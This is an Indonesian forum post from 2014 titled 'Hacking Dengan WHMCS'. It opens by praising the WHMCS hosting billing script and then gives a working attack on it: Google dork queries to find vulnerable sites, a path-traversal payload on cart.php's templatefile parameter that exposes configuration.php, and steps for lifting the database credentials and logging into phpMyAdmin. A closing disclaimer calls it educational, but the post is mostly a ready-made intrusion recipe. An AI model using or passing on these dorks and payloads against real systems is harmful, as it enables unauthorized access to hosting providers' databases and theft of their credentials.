WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster karena dengan memanage yang mudah. WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya. fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING WHMCS ini
Exploit Powered by whmcs
#Keyword Dork :
1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=
#Injector :
cart.php?a=test&templatefile=../../../configuration.php
#Contoh [sudah di patch] :
[You must be registered and logged in to see this link.]#Tambahkan Injector di belakang cart.php? sehingga menjadi :
[You must be registered and logged in to see this link.]
#Selanjutnya klik kanan > View page source
#Cari tulisan yang berwarna hijau seperti gambar di bawah ini :
#Selanjutnya kalian tinggal login di halaman PHPMyAdmin, contoh :
[You must be registered and logged in to see this link.]Selesai.
Tutorial ini hanya sebagai pembelajaran saja dan tidak bertujuan untuk merusak system milik siapapun. Dan juga sebagai peringatan kepada Admin WHMCS untuk segera melakukan patch untuk menghindari hal - hal yang tidak diinginkan.
Mon Feb 10, 2014 1:30 pm by HeaVeN007
Subyek: Hacking Dengan WHMCS 
